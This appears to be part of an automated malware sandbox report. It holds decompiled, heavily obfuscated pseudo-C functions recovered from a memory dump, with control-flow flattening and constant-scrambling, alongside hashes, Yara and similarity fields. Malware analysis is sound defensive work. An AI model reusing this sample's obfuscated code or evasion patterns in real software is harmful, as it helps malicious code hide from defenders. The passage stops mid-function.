                                                      				_v104 = 0xa114;
                                                      				_v104 = _v104 >> 5;
                                                      				_v104 = _v104 << 0xc;
                                                      				_v104 = _v104 / _t314;
                                                      				_v104 = _v104 ^ 0x0002b555;
                                                      				_v108 = 0xd093;
                                                      				_v108 = _v108 << 0xa;
                                                      				_t315 = 0x69;
                                                      				_v108 = _v108 * 0x4a;
                                                      				_v108 = _v108 / _t315;
                                                      				_v108 = _v108 ^ 0x024bf4a9;
                                                      				_v80 = 0x5298;
                                                      				_v80 = _v80 | 0xf2bddfef;
                                                      				_v80 = _v80 ^ 0xf2bdee35;
                                                      				_v84 = 0xad61;
                                                      				_v84 = _v84 << 6;
                                                      				_v84 = _v84 ^ 0x5376a172;
                                                      				_v84 = _v84 ^ 0x535d9bb3;
                                                      				_v96 = 0xfad4;
                                                      				_v96 = _v96 + 0xc0fb;
                                                      				_t316 = 0x75;
                                                      				_v96 = _v96 / _t316;
                                                      				_t317 = 0x41;
                                                      				_t323 = _a8;
                                                      				_v96 = _v96 / _t317;
                                                      				_v96 = _v96 ^ 0x00007e63;
                                                      				_v40 = 0x6cc;
                                                      				_v40 = _v40 + 0x5321;
                                                      				_v40 = _v40 ^ 0x00002fe7;
                                                      				_v76 = 0xe38c;
                                                      				_v76 = _v76 + 0x66b4;
                                                      				_v76 = _v76 >> 5;
                                                      				_v76 = _v76 ^ 0x00001a53;
                                                      				_v68 = 0xaffd;
                                                      				_v68 = _v68 + 0x9b0e;
                                                      				_v68 = _v68 ^ 0x74692a2f;
                                                      				_v68 = _v68 ^ 0x74685d67;
                                                      				_v92 = 0xd493;
                                                      				_v92 = _v92 >> 5;
                                                      				_v92 = _v92 + 0xffffb819;
                                                      				_v92 = _v92 << 3;
                                                      				_v92 = _v92 ^ 0xfffdea97;
                                                      				_v32 = 0x61b7;
                                                      				_v32 = _v32 >> 0xa;
                                                      				_v32 = _v32 ^ 0x00001b97;
                                                      				_v72 = 0x8555;
                                                      				_v72 = _v72 >> 6;
                                                      				_v72 = _v72 >> 7;
                                                      				_v72 = _v72 ^ 0x00005e98;
                                                      				_v64 = 0xfd5d;
                                                      				_v64 = _v64 ^ 0xfb760f92;
                                                      				_v64 = _v64 + 0xe44c;
                                                      				_v64 = _v64 ^ 0xfb77c0e2;
                                                      				_v24 = 0xfd78;
                                                      				_v24 = _v24 ^ 0x534e19f9;
                                                      				_v24 = _v24 ^ 0x534eb204;
                                                      				_v28 = 0xae38;
                                                      				_v28 = _v28 ^ 0x0fcca386;
                                                      				_v28 = _v28 ^ 0x0fcc33c1;
                                                      				_t268 = _a8;
                                                      				_v56 = 0x9a6f;
                                                      				_v56 = _v56 | 0xcfdc8d68;
                                                      				_v56 = _v56 ^ 0xf237fb5d;
                                                      				_v56 = _v56 ^ 0x3deb56e2;
                                                      				_v12 = 0xde50;
                                                      				_v12 = _v12 << 0xc;
                                                      				_v12 = _v12 ^ 0x0de56132;
                                                      				_v60 = 0x8399;
                                                      				_v60 = _v60 ^ 0x95508e48;
                                                      				_v60 = _v60 ^ 0xc724022f;
                                                      				_v60 = _v60 ^ 0x52742192;
                                                      				while(1) {
                                                      					L1:
                                                      					_t251 = 0x10ef006b;
                                                      					do {
                                                      						while(1) {
                                                      							L2:
                                                      							_t327 = _t271 - 0x1d995f52;
                                                      							if(_t327 > 0) {
                                                      								break;
                                                      							}
                                                      							if(_t327 == 0) {
                                                      								_t271 = 0x1679d154;
                                                      								continue;
                                                      							} else {
                                                      								if(_t271 == 0x829cfc0) {
                                                      									_t311 = _v8;
                                                      									if(_t311 != 0) {
                                                      										do {
                                                      											_t320 =  *((intOrPtr*)(_t311 + 0x220));
                                                      											E0023F536(_v56, _v12, _v60, _t311);
                                                      											_t311 = _t320;
                                                      										} while (_t320 != 0);
                                                      									}
                                                      								} else {
                                                      									if(_t271 == _t251) {
                                                      										_t312 = _v8;
                                                      										_t268 = 0;
                                                      										if(_t312 != 0) {
                                                      											do {
                                                      												E00236636(_t268 * 2 + _t323, _v80, _v84, _v96, _t312 + 0xc);
                                                      												_t256 = E00240ADC(_t312 + 0xc, _v40, _v76);
                                                      												_t325 =  &(_t325[4]);
                                                      												_t269 = _t268 + _t256;
                                                      												_t257 = 0x2c;
                                                      												 *((short*)(_t323 + _t269 * 2)) = _t257;
                                                      												_t268 = _t269 + 1;
                                                      												_t312 =  *((intOrPtr*)(_t312 + 0x220));
                                                      											} while (_t312 != 0);
                                                      											_t251 = 0x10ef006b;
                                                      										}
                                                      										_t319 = _v4;
                                                      										_t271 = 0x33a3af6e;
                                                      										_t310 = _a8;
                                                      										continue;
                                                      									} else {
                                                      										if(_t271 == 0x1679d154) {
                                                      											E00245A61( &_v8, E00248D1C, _v44, _v48, _v88);
                                                      											_t325 =  &(_t325[4]);
                                                      											_t271 = 0x20b4c829;
                                                      											while(1) {
                                                      												L1:
                                                      												_t251 = 0x10ef006b;
                                                      												goto L2;
                                                      											}
                                                      										} else {
                                                      											if(_t271 != 0x19514a0a) {
                                                      												goto L24;
                                                      											} else {
                                                      												_push(_t271);
                                                      												_push(_t271);
                                                      												_t323 = E00238736(_t319 + _t319);
                                                      												_t251 = 0x10ef006b;
                                                      												_t271 =  !=  ? 0x10ef006b : 0x829cfc0;
                                                      												continue;
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							L28:
                                                      							return 0 |  *_a8 != 0x00000000;
                                                      						}
                                                      						if(_t271 == 0x20b4c829) {
                                                      							_t309 = _v8;
                                                      							_t319 = 0;
                                                      							_v4 = 0;
                                                      							if(_t309 != 0) {
                                                      								do {
                                                      									_t258 = E00240ADC(_t309 + 0xc, _v16, _v20);
                                                      									_t309 =  *(_t309 + 0x220);
                                                      									_t319 = _t319 + 1 + _t258;
                                                      								} while (_t309 != 0);
                                                      								_v4 = _t319;
                                                      								_t251 = 0x10ef006b;
                                                      							}
                                                      							_t310 = _a8;
                                                      							_t271 = 0x19514a0a;
                                                      							goto L24;
                                                      						} else {
                                                      							if(_t271 == 0x2b3a1c97) {
                                                      								E0023F536(_v64, _v24, _v28, _t323);
                                                      								_t271 = 0x829cfc0;
                                                      								goto L1;
                                                      							} else {
                                                      								if(_t271 != 0x33a3af6e) {
                                                      									goto L24;
                                                      								} else {
                                                      									_t260 = _t310 + 4;
                                                      									 *(_t310 + 4) =  *(_t310 + 4) & 0x00000000;
                                                      									_t262 = E00245D1D(_v68, _v92, _v32, _v72, _t268 - 1, _t323, _v36, _t260);
                                                      									_t325 =  &(_t325[6]);
                                                      									 *_t310 = _t262;
                                                      									_t271 = 0x2b3a1c97;
                                                      									while(1) {
                                                      										L1:
                                                      										_t251 = 0x10ef006b;
                                                      										goto L2;
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L28;
                                                      						L24:
                                                      					} while (_t271 != 0x202e1177);
                                                      					goto L28;
                                                      				}
                                                      			}

                                                      0x0024a314
                                                      0x0024a319
                                                      0x0024a321
                                                      0x0024a329
                                                      0x0024a331
                                                      0x0024a339
                                                      0x0024a341
                                                      0x0024a349
                                                      0x0024a351
                                                      0x0024a359
                                                      0x0024a361
                                                      0x0024a369
                                                      0x0024a371
                                                      0x0024a37c
                                                      0x0024a384
                                                      0x0024a38c
                                                      0x0024a394
                                                      0x0024a39c
                                                      0x0024a3a4
                                                      0x0024a3a9
                                                      0x0024a3b1
                                                      0x0024a3b9
                                                      0x0024a3c1
                                                      0x0024a3c9
                                                      0x0024a3d1
                                                      0x0024a3d1
                                                      0x0024a3d1
                                                      0x0024a3d6
                                                      0x0024a3d6
                                                      0x0024a3d6
                                                      0x0024a3d6
                                                      0x0024a3dc
                                                      0x00000000
                                                      0x00000000
                                                      0x0024a3e2
                                                      0x0024a4cb
                                                      0x00000000
                                                      0x0024a3e8
                                                      0x0024a3ee
                                                      0x0024a592
                                                      0x0024a598
                                                      0x0024a59a
                                                      0x0024a59a
                                                      0x0024a5ad
                                                      0x0024a5b2
                                                      0x0024a5b6
                                                      0x0024a59a
                                                      0x0024a3f4
                                                      0x0024a3f6
                                                      0x0024a462
                                                      0x0024a466
                                                      0x0024a46a
                                                      0x0024a46c
                                                      0x0024a485
                                                      0x0024a494
                                                      0x0024a499
                                                      0x0024a49c
                                                      0x0024a4a0
                                                      0x0024a4a1
                                                      0x0024a4a6
                                                      0x0024a4a7
                                                      0x0024a4ad
                                                      0x0024a4b1
                                                      0x0024a4b1
                                                      0x0024a4b6
                                                      0x0024a4ba
                                                      0x0024a4bf
                                                      0x00000000
                                                      0x0024a3f8
                                                      0x0024a3fe
                                                      0x0024a450
                                                      0x0024a455
                                                      0x0024a458
                                                      0x0024a3d1
                                                      0x0024a3d1
                                                      0x0024a3d1
                                                      0x00000000
                                                      0x0024a3d1
                                                      0x0024a400
                                                      0x0024a406
                                                      0x00000000
                                                      0x0024a40c
                                                      0x0024a418
                                                      0x0024a419
                                                      0x0024a423
                                                      0x0024a425
                                                      0x0024a432
                                                      0x00000000
                                                      0x0024a432
                                                      0x0024a406
                                                      0x0024a3fe
                                                      0x0024a3f6
                                                      0x0024a3ee
                                                      0x0024a5ba
                                                      0x0024a5cf
                                                      0x0024a5cf
                                                      0x0024a4db
                                                      0x0024a543
                                                      0x0024a547
                                                      0x0024a549
                                                      0x0024a54f
                                                      0x0024a551
                                                      0x0024a55c
                                                      0x0024a561
                                                      0x0024a568
                                                      0x0024a56b
                                                      0x0024a56f
                                                      0x0024a573
                                                      0x0024a573
                                                      0x0024a578
                                                      0x0024a57f
                                                      0x00000000
                                                      0x0024a4dd
                                                      0x0024a4e3
                                                      0x0024a532
                                                      0x0024a539
                                                      0x00000000
                                                      0x0024a4e5
                                                      0x0024a4eb
                                                      0x00000000
                                                      0x0024a4f1
                                                      0x0024a4f1
                                                      0x0024a4f4
                                                      0x0024a511
                                                      0x0024a516
                                                      0x0024a519
                                                      0x0024a51b
                                                      0x0024a3d1
                                                      0x0024a3d1
                                                      0x0024a3d1
                                                      0x00000000
                                                      0x0024a3d1
                                                      0x0024a3d1
                                                      0x0024a4eb
                                                      0x0024a4e3
                                                      0x00000000
                                                      0x0024a584
                                                      0x0024a584
                                                      0x00000000
                                                      0x0024a590

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2a$L$c~$g]ht$/$V=$_
                                                      • API String ID: 0-445983283
                                                      • Opcode ID: 078e6ad265461bebca42c164fcce9eabec9b304a3c18c9b4c04194696e6c820d
                                                      • Instruction ID: 05664ee7300c47d88b8e96b90979ea82c034e7e09d735e01ec121f816f5dbe68
                                                      • Opcode Fuzzy Hash: 078e6ad265461bebca42c164fcce9eabec9b304a3c18c9b4c04194696e6c820d
                                                      • Instruction Fuzzy Hash: 7CD161725187828FD368CF65C48991FBBE2BFC4758F60890CF596862A0D7B49919CF83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E00247F1F(void* __ecx) {
                                                      				intOrPtr _v4;
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				signed int _v96;
                                                      				signed int _v100;
                                                      				signed int _v104;
                                                      				void* _t229;
                                                      				void* _t232;
                                                      				void* _t233;
                                                      				void* _t236;
                                                      				void* _t238;
                                                      				void* _t241;
                                                      				void* _t246;
                                                      				void* _t247;
                                                      				signed int _t249;
                                                      				signed int _t250;
                                                      				signed int _t251;
                                                      				signed int _t252;
                                                      				signed int _t253;
                                                      				intOrPtr _t271;
                                                      				void* _t272;
                                                      				signed int* _t274;
                                                      				void* _t277;
                                                      
                                                      				_t274 =  &_v104;
                                                      				_v16 = 0x432510;
                                                      				_v12 = 0x57033b;
                                                      				_v8 = 0x70a374;
                                                      				_t271 = 0;
                                                      				_t247 = __ecx;
                                                      				_v4 = 0;
                                                      				_t272 = 0x285a15;
                                                      				_v52 = 0x28a8;
                                                      				_v52 = _v52 << 0xb;
                                                      				_t249 = 0x64;
                                                      				_v52 = _v52 / _t249;
                                                      				_v52 = _v52 ^ 0x00032641;
                                                      				_v56 = 0x58c1;
                                                      				_v56 = _v56 ^ 0x08ae2152;
                                                      				_v56 = _v56 ^ 0xe42bbac7;
                                                      				_v56 = _v56 ^ 0xec85f018;
                                                      				_v60 = 0x32b9;
                                                      				_v60 = _v60 >> 7;
                                                      				_v60 = _v60 ^ 0x4ab7c61f;
                                                      				_v60 = _v60 ^ 0x4ab7bf69;
                                                      				_v88 = 0xcc29;
                                                      				_v88 = _v88 << 7;
                                                      				_v88 = _v88 >> 0xe;
                                                      				_t250 = 0x27;
                                                      				_v88 = _v88 * 0x71;
                                                      				_v88 = _v88 ^ 0x00008073;
                                                      				_v28 = 0x82bf;
                                                      				_v28 = _v28 / _t250;
                                                      				_v28 = _v28 ^ 0x0000421a;
                                                      				_v80 = 0xde89;
                                                      				_v80 = _v80 | 0x25f7ab60;
                                                      				_v80 = _v80 + 0xffffb767;
                                                      				_v80 = _v80 ^ 0x25f7d2d5;
                                                      				_v84 = 0xb172;
                                                      				_v84 = _v84 | 0x58f01ffb;
                                                      				_v84 = _v84 ^ 0x6aa9a845;
                                                      				_v84 = _v84 | 0x8208c103;
                                                      				_v84 = _v84 ^ 0xb259d8d2;
                                                      				_v48 = 0xe27e;
                                                      				_v48 = _v48 | 0xfee9bf5f;
                                                      				_v48 = _v48 ^ 0xfee98d98;
                                                      				_v64 = 0x40d4;
                                                      				_v64 = _v64 + 0xfffff13c;
                                                      				_v64 = _v64 << 8;
                                                      				_v64 = _v64 ^ 0x00321441;
                                                      				_v68 = 0x6862;
                                                      				_v68 = _v68 + 0x864e;
                                                      				_v68 = _v68 << 3;
                                                      				_v68 = _v68 ^ 0x0007582b;
                                                      				_v92 = 0x5758;
                                                      				_v92 = _v92 | 0xff7df76f;
                                                      				_t251 = 0x39;
                                                      				_v92 = _v92 / _t251;
                                                      				_v92 = _v92 ^ 0x047b2a85;
                                                      				_v96 = 0x40be;
                                                      				_v96 = _v96 | 0xd59932a3;
                                                      				_v96 = _v96 << 0xb;
                                                      				_v96 = _v96 * 0x52;
                                                      				_v96 = _v96 ^ 0x36096eff;
                                                      				_v72 = 0x18a0;
                                                      				_v72 = _v72 + 0x45e5;
                                                      				_v72 = _v72 + 0xffff9352;
                                                      				_v72 = _v72 ^ 0xffff81db;
                                                      				_v100 = 0x6e96;
                                                      				_v100 = _v100 * 0x3a;
                                                      				_v100 = _v100 << 0x10;
                                                      				_v100 = _v100 ^ 0x7246fe44;
                                                      				_v100 = _v100 ^ 0x7fbac885;
                                                      				_v104 = 0x65cf;
                                                      				_v104 = _v104 / _t251;
                                                      				_v104 = _v104 ^ 0xf75b4ca1;
                                                      				_t252 = 0x48;
                                                      				_v104 = _v104 / _t252;
                                                      				_v104 = _v104 ^ 0x036f7b06;
                                                      				_v76 = 0x2c53;
                                                      				_t253 = 0x57;
                                                      				_v76 = _v76 * 0x11;
                                                      				_v76 = _v76 ^ 0x6f057687;
                                                      				_v76 = _v76 ^ 0x6f07c581;
                                                      				_v24 = 0x7097;
                                                      				_v24 = _v24 >> 4;
                                                      				_v24 = _v24 ^ 0x000060b2;
                                                      				_v36 = 0x9151;
                                                      				_v36 = _v36 << 0x10;
                                                      				_v36 = _v36 ^ 0x43d947ca;
                                                      				_v36 = _v36 ^ 0xd2881410;
                                                      				_v40 = 0x482c;
                                                      				_v40 = _v40 + 0xffffb888;
                                                      				_v40 = _v40 << 1;
                                                      				_v40 = _v40 ^ 0x00000914;
                                                      				_v44 = 0x389f;
                                                      				_v44 = _v44 * 0x76;
                                                      				_v44 = _v44 * 0x18;
                                                      				_v44 = _v44 ^ 0x02723fe4;
                                                      				_v32 = 0x2aa8;
                                                      				_v32 = _v32 * 0x38;
                                                      				_v32 = _v32 ^ 0x551469c6;
                                                      				_v32 = _v32 ^ 0x551d1a3f;
                                                      				_v20 = 0xfc56;
                                                      				_v20 = _v20 / _t253;
                                                      				_v20 = _v20 ^ 0x000001b5;
                                                      				goto L1;
                                                      				do {
                                                      					while(1) {
                                                      						L1:
                                                      						_t277 = _t272 - 0x17308d28;
                                                      						if(_t277 > 0) {
                                                      							break;
                                                      						}
                                                      						if(_t277 == 0) {
                                                      							_push(_t253);
                                                      							_t236 = E00247F1B();
                                                      							_t274 =  &(_t274[1]);
                                                      							_t272 = 0x2b65fd67;
                                                      							_t271 = _t271 + _t236;
                                                      							continue;
                                                      						} else {
                                                      							if(_t272 == 0x285a15) {
                                                      								_t272 = 0x27256339;
                                                      								continue;
                                                      							} else {
                                                      								if(_t272 == 0x30e9834) {
                                                      									_t253 = _v72;
                                                      									_t238 = E0023D64E(_t253, _v100, _v104, _t247 + 0x18, _v76);
                                                      									_t274 =  &(_t274[3]);
                                                      									_t272 = 0x1bffcccd;
                                                      									_t271 = _t271 + _t238;
                                                      									continue;
                                                      								} else {
                                                      									if(_t272 == 0x527ec93) {
                                                      										_push(_t253);
                                                      										_t241 = E00247F1B();
                                                      										_t274 =  &(_t274[1]);
                                                      										_t272 = 0x1cfcffb7;
                                                      										_t271 = _t271 + _t241;
                                                      										continue;
                                                      									} else {
                                                      										if(_t272 != 0x60183f8) {
                                                      											goto L21;
                                                      										} else {
                                                      											_push(_v32);
                                                      											_t271 = _t271 + E00247F1B();
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						L8:
                                                      						return _t271;
                                                      					}
                                                      					if(_t272 == 0x1bffcccd) {
                                                      						_t253 = _v24;
                                                      						_t229 = E0023D64E(_t253, _v36, _v40, _t247 + 0x20, _v44);
                                                      						_t274 =  &(_t274[3]);
                                                      						_t272 = 0x60183f8;
                                                      						_t271 = _t271 + _t229;
                                                      						goto L21;
                                                      					} else {
                                                      						if(_t272 == 0x1cfcffb7) {
                                                      							_push(_t253);
                                                      							_t232 = E00247F1B();
                                                      							_t274 =  &(_t274[1]);
                                                      							_t272 = 0x17308d28;
                                                      							_t271 = _t271 + _t232;
                                                      							goto L1;
                                                      						} else {
                                                      							if(_t272 == 0x27256339) {
                                                      								_t253 = _v52;
                                                      								_t233 = E0023D64E(_t253, _v56, _v60, _t247, _v88);
                                                      								_t274 =  &(_t274[3]);
                                                      								_t272 = 0x527ec93;
                                                      								_t271 = _t271 + _t233;
                                                      								goto L1;
                                                      							} else {
                                                      								if(_t272 != 0x2b65fd67) {
                                                      									goto L21;
                                                      								} else {
                                                      									_push(_t253);
                                                      									_t246 = E00247F1B();
                                                      									_t274 =  &(_t274[1]);
                                                      									_t272 = 0x30e9834;
                                                      									_t271 = _t271 + _t246;
                                                      									goto L1;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					goto L8;
                                                      					L21:
                                                      				} while (_t272 != 0x28759a70);
                                                      				goto L8;
                                                      			}
                                                      0x00248052
                                                      0x0024805a
                                                      0x00248062
                                                      0x00248067
                                                      0x0024806f
                                                      0x00248077
                                                      0x0024807f
                                                      0x00248084
                                                      0x0024808c
                                                      0x00248094
                                                      0x002480a0
                                                      0x002480a3
                                                      0x002480a7
                                                      0x002480af
                                                      0x002480b7
                                                      0x002480bf
                                                      0x002480c9
                                                      0x002480cd
                                                      0x002480d5
                                                      0x002480dd
                                                      0x002480e5
                                                      0x002480ed
                                                      0x002480f5
                                                      0x0024810b
                                                      0x0024810f
                                                      0x00248114
                                                      0x0024811c
                                                      0x00248124
                                                      0x00248134
                                                      0x00248138
                                                      0x00248144
                                                      0x00248149
                                                      0x0024814f
                                                      0x00248157
                                                      0x00248164
                                                      0x00248165
                                                      0x00248169
                                                      0x00248171
                                                      0x00248179
                                                      0x00248181
                                                      0x00248186
                                                      0x0024818e
                                                      0x00248196
                                                      0x0024819b
                                                      0x002481a3
                                                      0x002481ab
                                                      0x002481b3
                                                      0x002481bb
                                                      0x002481bf
                                                      0x002481c7
                                                      0x002481d4
                                                      0x002481dd
                                                      0x002481e1
                                                      0x002481e9
                                                      0x002481f6
                                                      0x002481fa
                                                      0x00248202
                                                      0x0024820a
                                                      0x00248218
                                                      0x0024821c
                                                      0x0024821c
                                                      0x00248224
                                                      0x00248224
                                                      0x00248224
                                                      0x00248224
                                                      0x00248226
                                                      0x00000000
                                                      0x00000000
                                                      0x0024822c
                                                      0x002482c7
                                                      0x002482c8
                                                      0x002482cd
                                                      0x002482d0
                                                      0x002482d5
                                                      0x00000000
                                                      0x00248232
                                                      0x00248238
                                                      0x002482b5
                                                      0x00000000
                                                      0x0024823a
                                                      0x00248240
                                                      0x0024829d
                                                      0x002482a1
                                                      0x002482a6
                                                      0x002482a9
                                                      0x002482ae
                                                      0x00000000
                                                      0x00248242
                                                      0x00248248
                                                      0x0024827b
                                                      0x0024827c
                                                      0x00248281
                                                      0x00248284
                                                      0x00248289
                                                      0x00000000
                                                      0x0024824a
                                                      0x00248250
                                                      0x00000000
                                                      0x00248256
                                                      0x0024825e
                                                      0x00248267
                                                      0x00248267
                                                      0x00248250
                                                      0x00248248
                                                      0x00248240
                                                      0x00248238
                                                      0x00248269
                                                      0x00248272
                                                      0x00248272
                                                      0x002482e2
                                                      0x00248368
                                                      0x0024836c
                                                      0x00248371
                                                      0x00248374
                                                      0x00248379
                                                      0x00000000
                                                      0x002482e4
                                                      0x002482ea
                                                      0x00248346
                                                      0x00248347
                                                      0x0024834c
                                                      0x0024834f
                                                      0x00248351
                                                      0x00000000
                                                      0x002482ec
                                                      0x002482f2
                                                      0x00248326
                                                      0x0024832a
                                                      0x0024832f
                                                      0x00248332
                                                      0x00248337
                                                      0x00000000
                                                      0x002482f4
                                                      0x002482fa
                                                      0x00000000
                                                      0x002482fc
                                                      0x00248304
                                                      0x00248305
                                                      0x0024830a
                                                      0x0024830d
                                                      0x00248312
                                                      0x00000000
                                                      0x00248312
                                                      0x002482fa
                                                      0x002482f2
                                                      0x002482ea
                                                      0x00000000
                                                      0x0024837b
                                                      0x0024837b
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,H$9c%'$9c%'$S,$XW$bh$~
                                                      • API String ID: 0-4263808623
                                                      • Opcode ID: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
                                                      • Instruction ID: a9f81e8d668acd391d52818b89eb62460bb7722323642bd61be0ee2dc6d5c687
                                                      • Opcode Fuzzy Hash: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
                                                      • Instruction Fuzzy Hash: 06B131B29283818FD358CF25D98A40FFBE1BB84748F048A1DF59696260DBB5D909CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E002369A0(intOrPtr __ecx, intOrPtr* __edx) {
                                                      				intOrPtr _v4;
                                                      				intOrPtr _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				void* __edi;
                                                      				void* __ebp;
                                                      				void* _t182;
                                                      				intOrPtr _t188;
                                                      				intOrPtr _t190;
                                                      				intOrPtr _t191;
                                                      				intOrPtr _t192;
                                                      				intOrPtr* _t193;
                                                      				signed int _t195;
                                                      				signed int _t196;
                                                      				signed int _t197;
                                                      				void* _t198;
                                                      				void* _t199;
                                                      				void* _t218;
                                                      				intOrPtr _t222;
                                                      				void* _t223;
                                                      				intOrPtr _t227;
                                                      				signed int* _t228;
                                                      
                                                      				_t228 =  &_v84;
                                                      				_v8 = 0x71163c;
                                                      				_t222 = 0;
                                                      				_t193 = __edx;
                                                      				_v4 = 0;
                                                      				_v44 = 0xc562;
                                                      				_t227 = __ecx;
                                                      				_v44 = _v44 >> 2;
                                                      				_t223 = 0xa9ba57f;
                                                      				_v44 = _v44 ^ 0x8749252f;
                                                      				_v44 = _v44 ^ 0x87491d9f;
                                                      				_v16 = 0x2187;
                                                      				_v16 = _v16 + 0x9003;
                                                      				_v16 = _v16 ^ 0x00009583;
                                                      				_v64 = 0x884c;
                                                      				_v64 = _v64 ^ 0x157bb051;
                                                      				_t195 = 0x5b;
                                                      				_v64 = _v64 / _t195;
                                                      				_v64 = _v64 + 0xffffc6fd;
                                                      				_v64 = _v64 ^ 0x003c6beb;
                                                      				_v76 = 0xc2af;
                                                      				_t196 = 0x62;
                                                      				_v76 = _v76 / _t196;
                                                      				_v76 = _v76 << 0xb;
                                                      				_v76 = _v76 + 0xffffe747;
                                                      				_v76 = _v76 ^ 0x000fbc5b;
                                                      				_v20 = 0xd86f;
                                                      				_v20 = _v20 << 0xb;
                                                      				_v20 = _v20 ^ 0x06c32379;
                                                      				_v24 = 0x5847;
                                                      				_v24 = _v24 ^ 0xbe016602;
                                                      				_v24 = _v24 ^ 0xbe0159ab;
                                                      				_v56 = 0x8b9e;
                                                      				_v56 = _v56 << 8;
                                                      				_v56 = _v56 ^ 0x62eb1469;
                                                      				_v56 = _v56 ^ 0x62609790;
                                                      				_v60 = 0xc8f5;
                                                      				_v60 = _v60 | 0xe944ef36;
                                                      				_v60 = _v60 ^ 0xbc6be2e2;
                                                      				_v60 = _v60 ^ 0x552f2627;
                                                      				_v84 = 0x43ed;
                                                      				_v84 = _v84 ^ 0x08a0b069;
                                                      				_v84 = _v84 | 0x0c951c83;
                                                      				_v84 = _v84 + 0x562e;
                                                      				_v84 = _v84 ^ 0x0cb6752c;
                                                      				_v48 = 0x4b81;
                                                      				_v48 = _v48 >> 0xc;
                                                      				_v48 = _v48 + 0xffff2892;
                                                      				_v48 = _v48 ^ 0xffff31fe;
                                                      				_v80 = 0x3016;
                                                      				_v80 = _v80 + 0x7dde;
                                                      				_v80 = _v80 << 0xf;
                                                      				_t197 = 0x36;
                                                      				_v80 = _v80 / _t197;
                                                      				_v80 = _v80 ^ 0x019c7f33;
                                                      				_v52 = 0xfd2;
                                                      				_v52 = _v52 + 0xffff2d18;
                                                      				_v52 = _v52 + 0x6a3f;
                                                      				_v52 = _v52 ^ 0xffffabb5;
                                                      				_v28 = 0xa77b;
                                                      				_v28 = _v28 ^ 0xae749dbd;
                                                      				_v28 = _v28 ^ 0xae743f32;
                                                      				_v32 = 0xf75f;
                                                      				_v32 = _v32 | 0x58371397;
                                                      				_v32 = _v32 ^ 0x5837ee79;
                                                      				_v68 = 0x3d22;
                                                      				_v68 = _v68 >> 0xd;
                                                      				_v68 = _v68 << 0xf;
                                                      				_v68 = _v68 >> 2;
                                                      				_v68 = _v68 ^ 0x00007889;
                                                      				_v72 = 0xcbcf;
                                                      				_v72 = _v72 | 0x3a65856e;
                                                      				_v72 = _v72 + 0xdb4;
                                                      				_v72 = _v72 | 0x1789f940;
                                                      				_v72 = _v72 ^ 0x3feda3a8;
                                                      				_v36 = 0x2389;
                                                      				_v36 = _v36 * 0x4b;
                                                      				_v36 = _v36 | 0x61940fa3;
                                                      				_v36 = _v36 ^ 0x619e1b1f;
                                                      				_v40 = 0xa903;
                                                      				_v40 = _v40 + 0x4cf2;
                                                      				_v40 = _v40 | 0xc82713d6;
                                                      				_v40 = _v40 ^ 0xc827b671;
                                                      				_v12 = 0xc1c;
                                                      				_v12 = _v12 ^ 0x8bcf36f0;
                                                      				_v12 = _v12 ^ 0x8bcf5121;
                                                      				while(1) {
                                                      					L1:
                                                      					_t198 = 0x374e1c43;
                                                      					_t182 = 0x15aea868;
                                                      					L2:
                                                      					while(1) {
                                                      						do {
                                                      							if(_t223 == 0xa9ba57f) {
                                                      								_push(_t198);
                                                      								_push(_t198);
                                                      								_t199 = 0x38;
                                                      								_t222 = E00238736(_t199);
                                                      								__eflags = _t222;
                                                      								if(__eflags == 0) {
                                                      									_t223 = 0x3a1f14a3;
                                                      									_t182 = 0x15aea868;
                                                      									_t198 = 0x374e1c43;
                                                      									_t218 = 0x28fd42b4;
                                                      									goto L19;
                                                      								}
                                                      								_t223 = 0x2094e6da;
                                                      								L15:
                                                      								_t182 = 0x15aea868;
                                                      								L11:
                                                      								_t198 = 0x374e1c43;
                                                      								L12:
                                                      								_t218 = 0x28fd42b4;
                                                      								continue;
                                                      							}
                                                      							if(_t223 == 0xb1cacb5) {
                                                      								return E0023F536(_v36, _v40, _v12, _t222);
                                                      							}
                                                      							if(_t223 == _t182) {
                                                      								 *((intOrPtr*)(_t222 + 0x24)) = _t227;
